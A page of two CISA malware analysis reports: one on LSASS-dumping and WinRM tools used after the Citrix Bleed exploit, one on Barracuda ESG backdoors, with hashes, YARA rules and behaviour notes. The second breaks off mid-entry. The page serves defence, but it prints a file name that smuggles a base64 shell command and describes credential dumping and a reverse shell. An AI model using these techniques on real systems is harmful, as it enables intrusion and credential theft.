Analysis Reports

RSS Analysis Reports from National Cyber Awareness System

November 21, 2023

MAR-10478915-1.v1 Citrix Bleed | CISA

  

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

Responding to the recently disclosed CVE-2023-4966, affecting Citrix NetScaler ADC and NetScaler Gateway appliances, CISA received four files for analysis that show files being used to save registry hives, dump the Local Security Authority Subsystem Service (LSASS) process memory to disk, and attempts to establish sessions via Windows Remote Management (WinRM). The files include:

  • Windows Batch file (.bat)
  • Windows Executable (.exe)
  • Windows Dynamic Link Library (.dll)
  • Python Script (.py)

For more information about this vulnerability, see Joint Cybersecurity Advisory #StopRansomware: LockBit 3.0 Ransomware Affiliates Exploit CVE 2023-4966 Citrix Bleed Vulnerability.

Download the PDF version of this report:

MAR-10478915-1.v1 Citrix Bleed (PDF, 547.33 KB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-325A JSON (JSON, 37.22 KB )
Submitted Files (4)

17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994 (a.dll)

906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6 (a.py)

98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9 (a.bat)

e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068 (a.exe)

Findings

98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9

Details

-->

Name a.bat
Size 376 bytes
Type DOS batch file, ASCII text, with CRLF line terminators
MD5 52d5e2a07cd93c14f1ba170e3a3d6747
SHA1 8acaf9908229871ab33033df7b6a328ec1db56d5
SHA256 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
SHA512 317414f28d34f8295aa76cf9f39d4fd42c9bad292458dbd2a19f08a6a8b451e271179b7ef78afd8a2fe92a2e1103d9ef5e220557febf42d91900c268b8d61b69
ssdeep 6:halw5fwmUDXSLp8k7KdXSLp8kukK7va2RK4HvEEIVpmYY:sMULS98QAS98kuZ7XPcK3
Entropy 4.675128
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10478915_01 : trojan installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "installs-other-components"
           malware_Type = "trojan"
           tool_type = "information-gathering"
           description = "Detects trojan .bat samples"
           sha256 = "98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9"
       strings:
           $s1 = { 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 7a 2e 74 78 74 }
           $s2 = { 72 65 67 20 73 61 76 65 20 68 6b 6c 6d 5c 73 79 73 74 65 6d 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 65 6d }
           $s3 = { 6d 61 6b 65 63 61 62 20 63 3a 5c 75 73 65 72 73 5c 70 75 62 6c 69 63 5c 61 2e 70 6e 67 20 63 3a 5c 77 69 6e 64 6f 77 73 5c 74 61 73 6b 73 5c 61 2e 63 61 62 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Relationships
98e79f95cf... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
98e79f95cf... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
Description

This file is a Windows batch file called a.bat that is used to execute the file called a.exe with the file called a.dll as an argument. The output is printed to a file named 'z.txt' located in the path C:WindowsTasks. Next, a.bat pings the loop back internet protocol (IP) address 127.0.0[.]1 three times.

The next command it runs is reg save to save the HKLMSYSTEM registry hive into the C:Windowstasksem directory. Again, a.bat pings the loop back address 127.0.0[.]1 one time before executing another reg save command and saves the HKLMSAM registry hive into the C:WindowsTaskam directory. Next, a.bat runs three makecab commands to create three Cabinet (.cab) files from the previously mentioned saved registry hives and one file named C:UsersPublica.png. The names of the .cab files are as follows:

--Start names and paths of .cab files created--
c:windowstasksem.cab
c:windowstasksam.cab
c:windowstasksa.cab
--End names and paths of .cab files created--

Screenshots
Figure 1. - This is the full contents of the file a.bat.
Figure 1. - This is the full contents of the file a.bat.
e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
Tags

trojan

Details

-->

Name a.exe
Size 145920 bytes
Type PE32+ executable (console) x86-64, for MS Windows
MD5 37f7241963cf8279f7c1d322086a5194
SHA1 ec401ae8ddebef4038cedb65cc0d5ba6c1fdef28
SHA256 e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
SHA512 02c2473b90ba787fea41a9840c7dc9a9869685ca8fdca3521278e0cc986e1797e36552f41f1ac206f5ec5bdc0ac40f13cd36217aea3aad13518e9764ea92c1f7
ssdeep 3072:u8txkT6wDLf/p3ufznQbCQVlvxxV5hmWIh:NgpDbZufLQpjxJ9U
Entropy 6.094246
Malware Result unknown
Antivirus
Antiy Trojan/Win64.Malgent
Avira TR/Redcap.sbphc
Bitdefender Trojan.GenericKD.70103917
Emsisoft Trojan.GenericKD.70103917 (B)
IKARUS Trojan.Win64.Malgent
K7 Riskware ( 00584baa1 )
YARA Rules
  • rule CISA_10478915_02 : trojan installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "installs-other-components"
           malware_type = "trojan"
           tool_type = "unknown"
           description = "Detects trojan PE32 samples"
           sha256 = "e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068"
       strings:
           $s1 = { 57 72 69 74 65 46 69 6c 65 }
           $s2 = { 41 70 70 50 6f 6c 69 63 79 47 65 74 50 72 6f 63 65 73 73 54 65 72 6d 69 6e 61 74 69 6f 6e 4d 65 74 68 6f 64 }
           $s3 = { 6f 70 65 72 61 74 6f 72 20 63 6f 5f 61 77 61 69 74 }
           $s4 = { 43 6f 6d 70 6c 65 74 65 20 4f 62 6a 65 63 74 20 4c 6f 63 61 74 6f 72 }
           $s5 = { 64 65 6c 65 74 65 5b 5d }
           $s6 = { 4e 41 4e 28 49 4e 44 29 }
       condition:
           uint16(0) == 0x5a4d and pe.imphash() == "6e8ca501c45a9b85fff2378cffaa24b2" and pe.size_of_code == 84480 and all of them
    }
ssdeep Matches

No matches found.

Relationships
e557e1440e... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
Description

This file is a 64-bit Windows command-line executable called a.exe that is executed by a.bat. This file issues the Remote Procedure Call (RPC) ncalrpc:[lsasspirpc] to the RPC end point to provide a file path to the LSASS on the infected machine. Once the file path is returned, the malware loads the accompanying DLL file called a.dll into the running LSASS process. If the DLL is correctly loaded, then the malware outputs the message "[*]success" in the console.

17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994

Tags

trojan

Details

-->

Name a.dll
Size 106496 bytes
Type PE32+ executable (DLL) (console) x86-64, for MS Windows
MD5 206b8b9624ee446cad18335702d6da19
SHA1 364ef2431a8614b4ef9240afa00cd12bfba3119b
SHA256 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
SHA512 efa720237bd2773719d7f8e377f63f93d25a691a6f2b8f52ff9ecbd1495c215690d01400d8b7fd9bb79b47de09817d72c82676b67ed70ecf61b002c7d8e9e11d
ssdeep 3072:oCNLoO2N+p5Fm6nfZvD8sLVdN9dtFiokDFMYLcu:j1o/+34YRvDtFiwu
Entropy 5.940807
Malware Result unknown
Antivirus
Antiy Trojan/Win64.Agent
Bitdefender Trojan.GenericKD.70057986
Emsisoft Trojan.GenericKD.70057986 (B)
ESET a variant of Win64/Agent.DAU trojan
IKARUS Trojan.Win64.Agent
K7 Trojan ( 005ad67a1 )
Zillya! Trojan.Agent.Win64.39686
YARA Rules
  • rule CISA_10478915_03 : trojan steals_authentication_credentials credential_exploitation
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "steals-authentication-credentials"
           malware_type = "trojan"
           tool_type = "credential-exploitation"
           description = "Detects trojan DLL samples"
           sha256 = "17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994"
       strings:
           $s1 = { 64 65 6c 65 74 65 }
           $s2 = { 3c 2f 74 72 75 73 74 49 6e 66 6f 3e }
           $s3 = { 42 61 73 65 20 43 6c 61 73 73 20 44 65 73 63 72 69 70 74 6f 72 20 61 74 20 28 }
           $s4 = { 49 6e 69 74 69 61 6c 69 7a 65 43 72 69 74 69 63 61 6c 53 65 63 74 69 6f 6e 45 78 }
           $s5 = { 46 69 6e 64 46 69 72 73 74 46 69 6c 65 45 78 57 }
           $s6 = { 47 65 74 54 69 63 6b 43 6f 75 6e 74 }
       condition:
           uint16(0) == 0x5a4d and pe.subsystem == pe.SUBSYSTEM_WINDOWS_CUI and pe.size_of_code == 56832 and all of them
    }
ssdeep Matches

No matches found.

Relationships
17a27b1759... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
17a27b1759... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
Description

This file is a 64-bit Windows DLL called a.dll that is executed by a.bat as a parameter for the file a.exe. The file a.exe loads this file into the running LSASS process on the infected machine. The file a.dll calls the Windows API CreateFileW to create a file called a.png in the path C:UsersPublic.

Next, a.dll loads DbgCore.dll then utilizes MiniDumpWriteDump function to dump LSASS process memory to disk. If successful, the dumped process memory is written to a.png. Once this is complete, the file a.bat specifies that the file a.png is used to create the cabinet file called a.cab in the path C:WindowsTasks.

Screenshots
Figure 2 - Register R14
Figure 2. - This is the call to the register R14, which contains the MiniDumpWriteDump function that is being leveraged to dump the LSASS process memory to disk.
906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
Details

-->

Name a.py
Size 2645 bytes
Type Python script, ASCII text executable, with CRLF line terminators
MD5 9cff554fa65c1b207da66683b295d4ad
SHA1 b8e74921d7923c808a0423e6e46807c4f0699b6e
SHA256 906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6
SHA512 131621770e1899d81e6ff312b3245fe4e4013c36f82818a82fdd319982e6b742a72d906b6fb86c422bb720cd648f927b905a8fc193299ad7d8b3947e766abbd3
ssdeep 48:BpsnUP6s3ceBg5YbFYNXEtUyzzYyUyh0+FVzYA6P+Fqbaug9trYhTHhIQG86w09:BuUP6sseBIOqXEvpcrb89Z2THCQ6P
Entropy 4.748972
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10478915_04 : backdoor communicates_with_c2 remote_access
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10478915"
           date = "2023-11-06"
           last_modified = "20231108_1500"
           actor = "n/a"
           family = "n/a"
           capabilities = "communicates-with-c2"
           malware_type = "backdoor"
           tool_type = "remote-access"
           description = "Detects trojan python samples"
           sha256 = "906602ea3c887af67bcb4531bbbb459d7c24a2efcb866bcb1e3b028a51f12ae6"
       strings:
           $s1 = { 70 6f 72 74 20 3d 20 34 34 33 20 69 66 20 22 68 74 74 70 73 22 }
           $s2 = { 6b 77 61 72 67 73 2e 67 65 74 28 22 68 61 73 68 70 61 73 73 77 64 22 29 3a }
           $s3 = { 77 69 6e 72 6d 2e 53 65 73 73 69 6f 6e 20 62 61 73 69 63 20 65 72 72 6f 72 }
           $s4 = { 57 69 6e 64 77 6f 73 63 6d 64 2e 72 75 6e 5f 63 6d 64 28 73 74 72 28 63 6d 64 29 29 }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Description

This file is a Python script called a.py that attempts to leverage WinRM to establish a session. The script attempts to authenticate to the remote machine using NT LAN Manager (NTLM) if the keyword "hashpasswd" is present. If the keyword "hashpasswd" is not present, then the script attempts to authenticate using basic authentication. Once a WinRM session is established with the remote machine, the script has the ability to execute command line arguments on the remote machine. If there is no command specified, then a default command of “whoami” is run.

Screenshots
Figure 3 - Python Script
Figure 3. - This is the portion of the Python script that shows the command line options.
Figure 4 - NTLM or Basic Authentication
Figure 4. - This is the function showing how the script decides between using NTLM or basic authentication based on the keyword "hashpasswd".

Relationship Summary

98e79f95cf... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
98e79f95cf... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 17a27b1759f10d1f6f1f51a11c0efea550e2075c2c394259af4d3f855bbcc994
e557e1440e... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9
17a27b1759... Related_To e557e1440e394537cca71ed3d61372106c3c70eb6ef9f07521768f23a0974068
17a27b1759... Related_To 98e79f95cf8de8ace88bf223421db5dce303b112152d66ffdf27ebdfcdf967e9

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users' ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its "true file type" (i.e., the extension matches the file header).
  • Monitor users' web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, "Guide to Malware Incident Prevention & Handling for Desktops and Laptops".

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to the CISA at 1-888-282-0870 or CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA's homepage at www.cisa.gov.

September 7, 2023

MAR-10454006.r5.v1 SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER Backdoors | CISA

  

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:CLEAR--Recipients may share this information without restriction. Sources may use TLP:CLEAR when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:CLEAR information may be shared without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA obtained five malware samples - including artifacts related to SUBMARINE, SKIPJACK, SEASPRAY, WHIRLPOOL, and SALTWATER backdoors. The device was compromised by threat actors exploiting CVE-2023-2868, a former zero-day vulnerability affecting versions 5.1.3.001-9.2.0.006 of Barracuda Email Security Gateway (ESG).

For information about related malware, specifically information on the initial exploit payload, SEASPY backdoor, WHIRLPOOL backdoor, and the SUBMARINE backdoor, see CISA Alert: CISA Releases Malware Analysis Reports on Barracuda Backdoors.

Download the PDF version of this report:

AR23-250A_PDF (PDF, 1.05 MB )

For a downloadable copy of IOCs associated with this MAR in JSON format, see:

AR23-250A_JSON (JSON, 41.77 KB )
Submitted Files (5)

4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c (machineecho_-n_Y2htb2QgK3ggL3J...)

44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598 (mod_sender.lua)

63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90 (get_fs_info.pl)

9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf (saslautchd)

caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc (mod_rft.so)

Findings

4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c

Details

-->

Name machineecho_-n_Y2htb2QgK3ggL3Jvb3QvbWFjKgpzaCAvcm9vdC9tYWNoKlxgKgoK___base64_-d__sh_-slack
Size 3894 bytes
Type data
MD5 9fdc1dc99bc8184ee410880427dba89c
SHA1 be570775552f937d8588bceb3e2cbb0c18408fc1
SHA256 4183edae732506a18b5c802cbf0a471a77c3f1e4336a32ccb4958671e404493c
SHA512 2bb94fdfe31a464c63b8cd726f6ba1c3b18da538221d5bae943dfb03ec353a41826bdcb007bc2b7dfeb76afe619aa8ce078808e9b30079a6f947cce8ace891ff
ssdeep 3::
Entropy 0.000000
Malware Result unknown
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a SUBMARINE artifact, an empty text/data file. The name of the file is designed to exploit a vulnerability on the target environment where the base64 string within the file name will be executed on the Linux shell. The code in Figure 1 will change the permissions of any directory/file/path with that begins with '/root/mac' to executable. Then, anything containing the string 'mach*' in the directory/file/path '/root/mach' are executed.

Screenshots
Figure 1 - Figure 1 depicts the Base64 encoded, and decoded, name of the artifact.
Figure 1 - Figure 1 depicts the Base64 encoded, and decoded, name of the artifact.

 

63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90

Details

-->

Name get_fs_info.pl
Size 530 bytes
Type Perl script text executable
MD5 ad1dc51a66201689d442499f70b78dea
SHA1 c71bccdc006cca700257a69ed227e0cb1bc071ed
SHA256 63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90
SHA512 3258af057858ef0930a48771869871736bfb866ef740e81f2518c0d4c217b5c0c5f8eb06985b72a3762ce011458245940be6bb1d4907d2ed0f4e18886bbc48c3
ssdeep 12:HA4SKFBMygPZr7NBiC+c6jaY7PCbozFJG:thFBMZr7NBazjTzCbozG
Entropy 4.638131
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_11 : trojan
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-07-20"
           last_modified = "20230726_1700"
           actor = "n/a"
           family = "n/a"
           Capabilities = "n/a"
           Malware_Type = "trojan"
           Tool_Type = "unknown"
           description = "Detects perl script linked to SKIPJACK backdoor samples"
           SHA256 = "63788797919985d0e567cf9133ad2ab7a1c415e81598dc07c0bfa3a1566aeb90"
       strings:
           $s1 = { 2f 65 74 63 2f 66 73 74 61 62 2e 6d 61 69 6e }
           $s2 = { 28 3c 46 53 54 41 42 3e 29 }
           $s3 = { 6d 79 20 28 24 70 61 72 74 69 74 69 6f 6e 2c 20 24 66 73 5f 74 79 70 65 29 }
           $s4 = { 70 72 69 6e 74 20 24 66 73 5f 74 79 70 65 }
           $s5 = { 70 72 69 6e 74 20 24 70 61 72 74 69 74 69 6f 6e }
       condition:
           all of them
    }
ssdeep Matches

No matches found.

Description

This artifact, belonging to the SKIPJACK malware family, is a Perl script that enumerates file system information. This script first checks the file system by opening '/etc/fstab.main/,' then checks the value against the array 'ARGV[0]', which perl automatically provides to hold all values from the command line in. The script will print either 'xfs' or hda depending on the type of file system it finds. The script contains a second if statement that gathers more information about the type of file system. This second if statement contains the regular expression '/^/dev/(S+)d+s+/s+(S+)/,' which translates to '/etc/fstab.' The script uses this second half of the code to check for file system type or information about the partition, which it then prints based on the value of '$requested_data.'

Screenshots
Figure 2 - Figure 2 depicts code contained in
Figure 2 - Figure 2 depicts code contained in "get_fs_info.pl."

 

44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598

Details

-->

Name mod_sender.lua
Size 3930 bytes
Type ASCII text
MD5 666da297066a2596cacb13b3da9572bf
SHA1 64b337d7e82c82a4b40c8cb88fbc651929995eef
SHA256 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598
SHA512 4881a79d95bf83190be1542d7b26c7b1dee5eece1a689dc81bf2b661b43b3d724703dc4a48f824d8d960e2a480bcbea2e4007eb19023ee1bf329d993009deffc
ssdeep 96:JnJKszX3Z+p351GUw5FbsNmnwdx8sMEFoiKe3:JnJjzZ+j14FIEnqxjMEKQ
Entropy 5.041616
Malware Result unknown
Antivirus

No matches found.

YARA Rules
  • rule CISA_10454006_12 : SEASPRAY trojan evades_av
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10454006"
           date = "2023-08-23"
           last_modified = "20230905_1500"
           actor = "n/a"
           family = "SEASPRAY"
           capabilities = "evades-av"
           malware_type = "trojan"
           tool_type = "unknown"
           description = "Detects SEASPRAY samples"
           sha256 = "44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598"
       strings:
           $s1 = { 6f 73 2e 65 78 65 63 75 74 65 28 27 73 61 73 6c 61 75 74 63 68 64 27 }
           $s2 = { 73 65 6e 64 65 72 }
           $s3 = { 73 74 72 69 6e 67 2e 66 69 6e 64 }
           $s4 = { 73 74 72 69 6e 67 2e 6c 6f 77 65 72 }
           $s5 = { 62 6c 6f 63 6b 2f 61 63 63 65 70 74 }
           $s6 = { 72 65 74 75 72 6e 20 41 63 74 69 6f 6e 2e 6e 65 77 7b }
           $s7 = { 4c 69 73 74 65 6e 65 72 2e 6e 65 77 7b }
       condition:
           filesize }
ssdeep Matches

No matches found.

Relationships
44e1fbe71c... Used 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
Description

This artifact is a trojanized Lua module that has been identified as a "SEASPRAY" variant. SEASPRAY registers an event handler for all incoming email attachments. This variant checks for the sender and the string “obt”, which is hard coded in the lua file. If that string is found the malware uses os.execute to execute the file “saslautchd”, see Figure 3.

Screenshots
Figure 3 - This screenshot illustrates how the SEASPRAY filters traffic looking for the string
Figure 3 - This screenshot illustrates how the SEASPRAY filters traffic looking for the string "obt". Once that string is received SEASPRAY uses os.execute to execute the file "saslautchd".

 

9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf

Tags

trojan

Details

-->

Name saslautchd
Size 5034648 bytes
Type ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=913db6f2f3c21bcb11e0fd02e2b88908b15b5c2d, for GNU/Linux 3.2.0, stripped
MD5 436587bad5e061a7e594f9971d89c468
SHA1 cf22082532d4d6387ea1c9bc4dc5b255aa7a0290
SHA256 9f04525835f998d454ed68cfc7fcb6b0907f2130ae6c6ab7495d41aa36ad8ccf
SHA512 825ba4c46f1f9c5a4f2ab3ccfd8e3ec02f50f749776df783a085aff89cb19ed983b07ecd0703c74a0474bec56e918ada002b683dec1228f18181a91b0b339234
ssdeep 98304:J8sPi2iUKJYO0OAgikIn9FCJM+rXKZ9ldvVkhyfMuG9vU:xVUildN0uX
Entropy 6.384586
Malware Result unknown
Antivirus
Antiy Trojan/Linux.SAgnt
Avira LINUX/Whirlpool.A
Bitdefender Trojan.Generic.34035237
Emsisoft Trojan.Generic.34035237 (B)
ESET Linux/WhirlPool.A trojan
McAfee Generic trojan.xj
Sophos Linux/Agnt-BS
Varist E64/Agent.FP
YARA Rules
  • rule CISA_10452108_02 : WHIRLPOOL backdoor communicates_with_c2 installs_other_components
    {
       meta:
           author = "CISA Code & Media Analysis"
           incident = "10452108"
           date = "2023-06-20"
           last_modified = "20230804_1730"
           actor = "n/a"
           family = "WHIRLPOOL"
           Capabilities = "communicates-with-c2 installs-other-components"
           Malware_Type = "backdoor"
           Tool_Type = "unknown"
           description = "Detects malicious Linux WHIRLPOOL samples"
           sha256_1 = "83ca636253fd1eb898b244855838e2281f257bbe8ead428b69528fc50b60ae9c"
           sha256_2 = "8849a3273e0362c45b4928375d196714224ec22cb1d2df5d029bf57349860347"
       strings:
           $s0 = { 65 72 72 6f 72 20 2d 31 20 65 78 69 74 }
           $s1 = { 63 72 65 61 74 65 20 73 6f 63 6b 65 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $s2 = { c7 00 20 32 3e 26 66 c7 40 04 31 00 }
           $a3 = { 70 6c 61 69 6e 5f 63 6f 6e 6e 65 63 74 }
           $a4 = { 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 3a 20 25 73 28 65 72 72 6f 72 3a 20 25 64 29 }
           $a5 = { 73 73 6c 5f 63 6f 6e 6e 65 63 74 }
       condition:
           uint32(0) == 0x464c457f and 4 of them
    }
ssdeep Matches

No matches found.

Relationships
9f04525835... Used_By 44e1fbe71c9fcf9881230cb924987e0e615a7504c3c04d44ae157f07405e3598
Description

This artifact, belonging to the WHIRLPOOL malware family, is a 64-bit Linux Executable and Linkable Format (ELF) file. The malware checks processor hardware and architecture, to include if the target system uses AMD or Intel, see Figure 4. Figure 5 shows the malware determining the kernel version by invoking the 'uname' command line function and exploring the contents of the '/proc/sys/kernel/osrelease' file. Figures 6, 7, and 8 show the malware's capacity to connect to a remote address, and then create a new process with the command line argument '/bin/sh.' The connection to a remote host and the invocation of a bash shell are the two components/phases used by reverse shells. Figure 9 shows the malware's capacity to interact with the Name Service Cache Daemon by creating and connecting to a Unix socket at ./var/run/nscd/socket.' This socket can cache Domain Name System (DNS) requests. Rather than listening on port 53, it listens on the socket file itself, for data from other programs/processes. Figure 10 shows the malware's capacity to perform DNS resolution, using the system call 'sys_getpeername.' The malware accesses the target's environment variables. See below list below:

--Begin Accessed Environment Variables--
GCONV_PATH
GETCONF_DIR
HTTPS_PROXY
HTTP_PROXY
LANG
LANGUAGE
LC_ALL
LC_COLLATE
LD_WARN
LD_LIBRARY_PATH
LD_BIND_NOW
LD_BIND_NOT
LD_DYNAMIC_WEAK
LD_PROFILE_OUTPUT
LD_ASSUME_KERNEL
LOCALDOMAIN
NO_PROXY
OPENSSL_CONF
OPENSSL_ia32cap
OUTPUT_CHARSET
POSIX
TZ
TZDIR
RESOLV_ADD_TRIM_DOMAINS
RESOLV_HOST_CONF
RESOLV_MULTI
RESOLV_OVERRIDE_TRIM_DOMAINS
RES_OPTIONS
RESOLV_REORDER
--End Accessed Environment Variables--

The malware further access the following files at runtime:

--Begin Accessed Files--
/etc/aliases
/etc/ethers
/etc/group
/etc/hosts
/etc/networks
/etc/protocols
/etc/passwd
/etc/rpc
/etc/services
/etc/gshadow
/etc/shadow
/etc/netgroup
/dev/full
/dev/urandom
/dev/random
/proc/sys/kernel/rtsig-
/proc/sys/kernel/ngroups_max
/sys/devices/system/cpu/online
/proc/stat
/proc/self/fd
-- End Accessed Files--

Screenshots

 

Figure 4 - Figure 4 depicts the use of the 'cpuid' assembly instruction and strings amalgamating to 'intel' and 'AMD.'
Figure 4 - Figure 4 depicts the use of the 'cpuid' assembly instruction and strings amalgamating to 'intel' and 'AMD.'

 

Figure 5 - Figure 5 depicts the 'uname' Linux OS command line function. This figure further depicts a call to functions that open and read the contents of the path '/proc/sys/kernel/osrelease/.'
Figure 5 - Figure 5 depicts the 'uname' Linux OS command line function. This figure further depicts a call to functions that open and read the contents of the path '/proc/sys/kernel/osrelease/.'

 

Figure 6 - Figure 6 depicts the creation of a socket that facilitates Internet Protocol Version 4 connections. It further depicts a connection to a remote address using the 'sys_connect' function.
Figure 6 - Figure 6 depicts the creation of a socket that facilitates Internet Protocol Version 4 connections. It further depicts a connection to a remote address using the 'sys_connect' function.

 

Figure 7 - Figure 7 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.
Figure 7 - Figure 7 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.

 

Figure 8 - Figure 8 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.
Figure 8 - Figure 8 depicts the string 'sh -c /bin/sh' fed into the 'sys_execve' function as an argument.

 

Figure 9 - Figure 9 shows the malware's ability to interact with the Name Service Cache Daemon.
Figure 9 - Figure 9 shows the malware's ability to interact with the Name Service Cache Daemon.
 
Figure 10 - Figure 10 depicts the Linux OS system call, 'sys_getpeername.'
Figure 10 - Figure 10 depicts the Linux OS system call, 'sys_getpeername.'

caab341a35badbc65046bd02efa9ad2fe2671eb80ece0f2fa9cf70f5d7f4bedc

Tags

trojan

Details

-->

Name mod_rft.so
Size 1668232 bytes
Type ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
